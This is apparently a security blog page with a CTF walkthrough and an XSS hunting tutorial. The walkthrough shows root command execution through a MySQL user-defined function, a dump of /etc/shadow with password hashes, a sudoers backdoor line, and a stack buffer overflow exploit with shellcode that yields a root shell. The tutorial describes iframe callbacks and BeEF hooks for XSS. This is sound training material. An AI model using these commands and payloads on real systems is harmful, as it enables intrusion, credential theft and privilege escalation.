create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;


mysql> SELECT do_system('cat /etc/shadow');
+------------------------------+
| do_system('cat /etc/shadow') |
+------------------------------+
|                            0 |
+------------------------------+
1 row in set (0.01 sec)

mysql> select do_system('cat /etc/shadow > /tmp/shadow');
+--------------------------------------------+
| do_system('cat /etc/shadow > /tmp/shadow') |
+--------------------------------------------+
|                                          0 |
+--------------------------------------------+
1 row in set (0.01 sec)

mysql> select do_system('chmod 777 /tmp/shadow');
+------------------------------------+
| do_system('chmod 777 /tmp/shadow') |
+------------------------------------+
|                                  0 |
+------------------------------------+
1 row in set (0.02 sec)


[email protected]:/tmp$ cat shadow
root:$6$cQPCchYp$rWjOEHF47iuaGk/DQdkG6Dhhfm3.hTaNZPO4MoyBz2.bn44fERcQ23XCsp43LOt5NReEUjwDF8WDa5i1ML2jH.:16695:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
sys:*:16652:0:99999:7:::
sync:*:16652:0:99999:7:::
games:*:16652:0:99999:7:::
man:*:16652:0:99999:7:::
lp:*:16652:0:99999:7:::
mail:*:16652:0:99999:7:::
news:*:16652:0:99999:7:::
uucp:*:16652:0:99999:7:::
proxy:*:16652:0:99999:7:::
www-data:*:16652:0:99999:7:::
backup:*:16652:0:99999:7:::
list:*:16652:0:99999:7:::
irc:*:16652:0:99999:7:::
gnats:*:16652:0:99999:7:::
nobody:*:16652:0:99999:7:::
libuuid:!:16652:0:99999:7:::
syslog:*:16652:0:99999:7:::
messagebus:*:16652:0:99999:7:::
usbmux:*:16652:0:99999:7:::
dnsmasq:*:16652:0:99999:7:::
avahi-autoipd:*:16652:0:99999:7:::
kernoops:*:16652:0:99999:7:::
rtkit:*:16652:0:99999:7:::
saned:*:16652:0:99999:7:::
whoopsie:*:16652:0:99999:7:::
speech-dispatcher:!:16652:0:99999:7:::
avahi:*:16652:0:99999:7:::
lightdm:*:16652:0:99999:7:::
colord:*:16652:0:99999:7:::
hplip:*:16652:0:99999:7:::
pulse:*:16652:0:99999:7:::
smeagol:$6$vu8Pfezj$6ldY35ytL8yRd.Gp947FnW3t/WrMZXIL7sqTQS4wuSKeAiYeoYCy7yfS2rBpAPvFCPuo73phXmpOoLsg5REXz.:16695:0:99999:7:::
mysql:!:16695:0:99999:7:::
sshd:*:16696:0:99999:7:::



mysql> SELECT do_system('echo "smeagol ALL=NOPASSWD: ALL" >> /etc/sudoers');
+---------------------------------------------------------------+
| do_system('echo "smeagol ALL=NOPASSWD: ALL" >> /etc/sudoers') |
+---------------------------------------------------------------+
|                                                             0 |
+---------------------------------------------------------------+
1 row in set (0.00 sec)

mysql>

GAME OVER!

Since the MySQL daemon was running as “root” and our custom function allows us to execute commands, the quickest way to root was to either dump the /etc/shadow file and crack the root password or add the current user to the sudoers file.

[email protected]:/tmp$ sudo su
[email protected]:/tmp# whoami
root
[email protected]:/tmp# cd /root
[email protected]:~# ls
buf  buf.c  Flag.txt  other  other.c  switcher.py
[email protected]:~# cat Flag.txt 
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf
[email protected]:~#

GOING THE EXTRA MILE

[email protected]:~# ssh [email protected]
The authenticity of host '192.168.1.138 (192.168.1.138)' can't be established.
ECDSA key fingerprint is f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.138' (ECDSA) to the list of known hosts.

                                                  .____    _____________________________
                                                  |    |   \_____  \__    ___/\______   \
                                                  |    |    /   |   \|    |    |       _/
                                                  |    |___/    |    \    |    |    |   \
                                                  |_______ \_______  /____|    |____|_  /
                                                          \/       \/                 \/
 ____  __.                     __     ___________      .__                   .___ ___________      ___________       __
|    |/ _| ____   ____   ____ |  | __ \_   _____/______|__| ____   ____    __| _/ \__    ___/___   \_   _____/ _____/  |_  ___________
|      <  /    \ /  _ \_/ ___\|  |/ /  |    __) \_  __ \  |/ __ \ /    \  / __ |    |    | /  _ \   |    __)_ /    \   __\/ __ \_  __ \
|    |  \|   |  (  <_> )  \___|    <   |     \   |  | \/  \  ___/|   |  \/ /_/ |    |    |(  <_> )  |        \   |  \  | \  ___/|  | \/
|____|__ \___|  /\____/ \___  >__|_ \  \___  /   |__|  |__|\___  >___|  /\____ |    |____| \____/  /_______  /___|  /__|  \___  >__|
        \/    \/            \/     \/      \/                  \/     \/      \/                           \/     \/          \/
Easy as 1,2,3
[email protected]'s password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

 * Documentation:  https://help.ubuntu.com/

261 packages can be updated.
128 updates are security updates.

                            .____    _____________________________                              
                            |    |   \_____  \__    ___/\______   \                             
                            |    |    /   |   \|    |    |       _/                             
                            |    |___/    |    \    |    |    |   \                             
                            |_______ \_______  /____|    |____|_  /                             
                                    \/       \/                 \/                              
 __      __       .__                                ___________      .__                   .___
/  \    /  \ ____ |  |   ____  ____   _____   ____   \_   _____/______|__| ____   ____    __| _/
\   \/\/   // __ \|  | _/ ___\/  _ \ /     \_/ __ \   |    __) \_  __ \  |/ __ \ /    \  / __ | 
 \        /\  ___/|  |_\  \__(  <_> )  Y Y  \  ___/   |     \   |  | \/  \  ___/|   |  \/ /_/ | 
  \__/\  /  \___  >____/\___  >____/|__|_|  /\___  >  \___  /   |__|  |__|\___  >___|  /\____ | 
       \/       \/          \/            \/     \/       \/                  \/     \/      \/ 
Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
[email protected]:~$ ls
Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  Templates  Videos
[email protected]:~$ cd ./
[email protected]:~$ cd /
[email protected]:/$ ls
bin  boot  cdrom  dev  etc  home  initrd.img  lib  lost+found  media  mnt  opt  proc  root  run  sbin  SECRET  srv  sys  tmp  usr  var  vmlinuz
[email protected]:/$ cd SECRET
[email protected]:/SECRET$ ls
door1  door2  door3
[email protected]:/SECRET$ ls -lh
total 12K
drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door1
drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door2
drwxr-xr-x 2 root root 4.0K Jan 17 15:03 door3
[email protected]:/SECRET$ cd door3
[email protected]:/SECRET/door3$ ls
file
[email protected]:/SECRET/door3$ ls -lh
total 8.0K
-rwsr-xr-x 1 root root 5.1K Sep 22 13:01 file
[email protected]:/SECRET/door3$ ./file
Syntax: ./file < input string>

BUFFER OVERFLOW FUZZING

[email protected]:/SECRET/door3$ ls
file
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x2048'`
Segmentation fault (core dumped)
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x200'`
Segmentation fault (core dumped)
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x150'`
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x170'`
[email protected]:/SECRET/door3$ ./file `perl -e 'print "A"x171'`
Illegal instruction (core dumped)

FINDING THE OFFSET

[email protected]:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 1024
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
[email protected]:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 41376641
[*] Exact match at offset 171
[email protected]:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb 36664135
[*] Exact match at offset 167
[email protected]:~#

CHECKING FOR ASLR

[email protected]:/SECRET/door1$ ls
file
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb77b9000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75f2000)
	/lib/ld-linux.so.2 (0xb77bb000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7708000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7541000)
	/lib/ld-linux.so.2 (0xb770a000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7740000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7579000)
	/lib/ld-linux.so.2 (0xb7742000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb773b000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7574000)
	/lib/ld-linux.so.2 (0xb773d000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7783000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75bc000)
	/lib/ld-linux.so.2 (0xb7785000)
[email protected]:/SECRET/door1$ ldd file
	linux-gate.so.1 =>  (0xb7764000)
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb759d000)
	/lib/ld-linux.so.2 (0xb7766000)
[email protected]:/SECRET/door1$ 



[email protected]:/tmp$ cat test.c
#include 

int main()
{
    int a;
    printf("%p\n", &a);
    return 0;
}

[email protected]:/tmp$ ls
exploit.poy  exploit.py  test.c
[email protected]:/tmp$ gcc test.c -o test
[email protected]:/tmp$ ./test
0xbfc0ad2c
[email protected]:/tmp$ ./test
0xbfa93a1c
[email protected]:/tmp$ ./test
0xbff82e3c

DEBUGGING

[email protected]:/SECRET/door3$ gdb -q ./file
Reading symbols from ./file...(no debugging symbols found)...done.
(gdb) r `perl -e 'print "A"x171, "B"x4, "C"x2000'`
Starting program: /SECRET/door3/file `perl -e 'print "A"x171, "B"x4, "C"x2000'`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) disass main
Dump of assembler code for function main:
   0x0804845d <+0>:	push   %ebp
   0x0804845e <+1>:	mov    %esp,%ebp
   0x08048460 <+3>:	and    $0xfffffff0,%esp
   0x08048463 <+6>:	sub    $0xb0,%esp
   0x08048469 <+12>:	cmpl   $0x1,0x8(%ebp)
   0x0804846d <+16>:	jg     0x8048490 <main+51>
   0x0804846f <+18>:	mov    0xc(%ebp),%eax
   0x08048472 <+21>:	mov    (%eax),%eax
   0x08048474 <+23>:	mov    %eax,0x4(%esp)
   0x08048478 <+27>:	movl   $0x8048540,(%esp)
   0x0804847f <+34>:	call   0x8048310 <[email protected]>
   0x08048484 <+39>:	movl   $0x0,(%esp)
   0x0804848b <+46>:	call   0x8048340 <[email protected]>
   0x08048490 <+51>:	mov    0xc(%ebp),%eax
   0x08048493 <+54>:	add    $0x4,%eax
   0x08048496 <+57>:	mov    (%eax),%eax
   0x08048498 <+59>:	mov    %eax,0x4(%esp)
   0x0804849c <+63>:	lea    0x11(%esp),%eax
   0x080484a0 <+67>:	mov    %eax,(%esp)
   0x080484a3 <+70>:	call   0x8048320 <[email protected]>
   0x080484a8 <+75>:	mov    $0x0,%eax
   0x080484ad <+80>:	leave  
   0x080484ae <+81>:	ret    
End of assembler dump.
(gdb) info reg
eax            0x0	0
ecx            0xbfe311f0	-1075637776
edx            0xbfe2fb28	-1075643608
ebx            0xb76e2000	-1217519616
esp            0xbfe2f360	0xbfe2f360
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0x42424242	0x42424242
eflags         0x10202	[ IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) 
</[email protected]></[email protected]></[email protected]></main+51>

FINDING A GOOD PLACE FOR OUR RETURN ADDRESS

(gdb) r `perl -e 'print "A"x171, "B"x4, "\x90"x4000'`

(gdb) x/2500x $esp
0xbf92eaf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb50:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb60:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb70:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb80:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eb90:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eba0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebb0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebc0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebd0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebe0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ebf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec50:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec60:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec70:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec80:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ec90:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92eca0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecb0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecc0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecd0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ece0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ecf0:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed00:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed10:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed20:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed30:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed40:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed50:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed60:	0x90909090	0x90909090	0x90909090	0x90909090
0xbf92ed70:	0x90909090	0x90909090	0x90909090	0x90909090

CONSTRUCTING OUR BUFFER

JUMP ADDRESS = 0xbf92eb80
LITTLE ENDIAN = \x80\xeb\x92\xbf

OFFSET = 171
JMP = \x80\xeb\x92\xbf
NOOP = \x90*2000
SHELLCODE = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80

BUFFER = OFFSET + JMP + NOOP + SHELLCODE

EXPLOITATION

[email protected]:/SECRET/door3$ for a in {1..1000}; do ./file `perl -e 'print "A"x171, "\x80\xeb\x92\xbf", "\x90"x2000', "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"`; done;Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# whoami
root

Questions? Comments? Send to @CrowdShield on Twitter.. l8rz!

January 17, 2016 xer0dayz CTF's, Hacking Tutorials, Uncategorized No comments yet

InjectX to Find XSS Tutorial

Overview

In this tutorial, I will cover a simple technique to identify reflected values in a target web application and easily locate Cross-Site Scripting vulnerabilities. By injecting unique heuristic strings, we can quickly check if the value we are testing is reflected and not being sanitized by the application. I have used this technique in the past and it has helped me find various injection bugs that have paid up to $500 in some cases.

Requirements

In order to use this technique, you’ll need Burpsuite along with the custom grep strings and fuzz lists provided in this tutorial to get started. For more advanced tricks covered at the end of this tutorial, you’ll also need Apache and Beef (Browser Exploitation Framework).

Why is this helpful to me?

Using this technique allows you to do the following:

1. Find reflected values quickly (only 3 requests per injection point)
2. Find the location of all reflected values in the response
3. Confirm XSS vectors via heuristic testing
4. Exploit XSS vectors with certainty

Great! How do I do it?

1. Download the Burp attack configuration or manual payload and grep strings here
2. Load the attack configuration or manual payload lists from the Burp Intruder menu

3. Copy/paste the request to the Intruder screen and add injection points:

– Form fields
– GET/POST parameters
– Header fields
– Cookie values
– URI structure

NOTE: You’ll need to copy/paste the hostname into the “Host” tab of the Intruder configuration for this to work.

4. Run the attack and analyze the results. Is “INJECTX” reflected? If so, are HTML special characters such as <>/()”’ sanitized? If not, XSS is possible.

5. If HTML special characters are reflected in the response, proceed to XSS exploitation

Workflow:

1. Is the injection point reflected in the response? If yes, goto step 2. As seen below, the “INJECTX” string is found which confirms the payload was reflected.

2. If the payload was reflected in the response, where in the response is it reflected? Search for “INJECTX” to find all injection points. Go to step 3.
3. Once reflected injection points are found, which characters are being sanitized? Again, search for “INJECTX” in the response and look for the heuristic test characters to see which are still untampered. At a minimum, we’ll need “‘>” and “(INJECTX)” as your grep strings. If these characters or search strings are found, then XSS is possible. Proceed to step 4.

4. If XSS is possible, inject our “real” XSS payloads either through manual browser attempts, Burp Intruder or Repeater to exploit the XSS vector. In this case, I’m using an < iframe > that’s linked back to my web server.

Remote XSS Confirmation

Using a remote payload such as an < iframe > or < img >, you can get remote confirmation via Apache logs which also help keep track of blind and stored XSS vectors. This will also list the referring page the XSS loaded from along with the source IP which helps to keep track of which page and hosts are vulnerable.

Advanced XSS and Client-side Attacks via Beef

Since we control the < iframe > page, we can inject whatever HTML/JS code we want. In this case, it loads a Beef (Browser Exploitation Framework) hook.js which can be used to launch more advanced XSS/client side attacks.

Drawbacks and limitations:

– XSS vectors must be reflected in the static HTML response
– Does not work with DOM XSS injections unless additional plugins such as BurpKit are used or JS is rendered manually using other techniques
– Does not work great for blind XSS vectors
– Does not take into account XSS bypass methods if input is sanitized